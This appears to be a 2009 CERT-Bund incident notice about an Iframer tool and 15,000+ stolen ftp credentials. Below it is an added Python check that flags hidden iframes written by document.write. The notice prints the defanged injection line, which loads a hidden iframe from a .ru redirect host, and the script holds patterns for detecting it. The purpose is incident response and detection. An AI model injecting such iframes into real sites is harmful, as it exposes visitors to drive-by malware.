[nsp-sec] Compromised ftp accounts
Thomas Hungenberg
th.lab at hungenberg.net
Tue Aug 25 06:27:47 EDT 2009
Hi teams,
I've come across an Iframer installation along with a list of 15.000+ ftp credentials.
The Iframer tool most probably recently tried to inject this line (remove 'XXX'):
<scrXXXipt>document.write(\'<ifrXXXame src=\"htXXXtp://sexyy.ru/tds/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></ifrXXXame>\');</scrXXXipt>
Please find attached a sanitized list (pw removed) of the compromised ftp accounts.
Format: ASN | IP | CC | ftp username | AS name
Top 10 country codes:
5240 US
1263 RU
1187 DE
882 EU
803 TR
720 CZ
674 FR
655 PL
564 HU
475 NL
- Thomas
CERT-Bund Incident Response & Anti-Malware Team
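
Added example, not part of the original message or CERT-Bund's tooling: a small Python check that site owners could run over files served from an affected ftp account, flagging `<script>` blocks that `document.write()` a hidden iframe of the shape quoted above. The sample pages and the `example.invalid` / `example.org` URLs are constructed, and the function and pattern names are assumptions of this sketch.

```python
import re

# Heuristics modelled on the injected line quoted in the message: a <script>
# that document.write()s an <iframe> with zero size or hidden styling.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
HIDDEN = {
    "zero width": re.compile(r"""\bwidth\s*=\s*["']?0(?:px)?(?![\w.%])""", re.I),
    "zero height": re.compile(r"""\bheight\s*=\s*["']?0(?:px)?(?![\w.%])""", re.I),
    "display:none": re.compile(r"display\s*:\s*none", re.I),
    "visibility:hidden": re.compile(r"visibility\s*:\s*hidden", re.I),
}

def normalize(js):
    """Strip the backslash escaping (\\' and \\") seen in the quoted line."""
    return re.sub(r"\\(['\"/])", r"\1", js)

def find_hidden_iframes(page):
    """Return [(src, [reasons])] for hidden iframes written by inline script."""
    hits = []
    for script in SCRIPT_RE.finditer(page):
        body = script.group(1)
        if "document.write" not in body:
            continue
        for tag in IFRAME_RE.finditer(normalize(body)):
            attrs = tag.group(1)
            reasons = [name for name, rx in HIDDEN.items() if rx.search(attrs)]
            if reasons:
                src = SRC_RE.search(attrs)
                hits.append((src.group(1) if src else None, reasons))
    return hits

# Constructed sample pages (not taken from any real site).
INFECTED = r"""<html><body><p>hello</p>
<script>document.write(\'<iframe src=\"http://example.invalid/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></iframe>\');</script>
</body></html>"""
BENIGN = """<html><body>
<script>document.write('<iframe src="https://example.org/map" width="600" height="400"></iframe>');</script>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("infected", INFECTED), ("benign", BENIGN)):
        print(label, find_hidden_iframes(page))
```

The check only covers iframes written by inline script; a hit is a reason to restore the file from a clean copy and change the ftp password, not proof of which tool modified it.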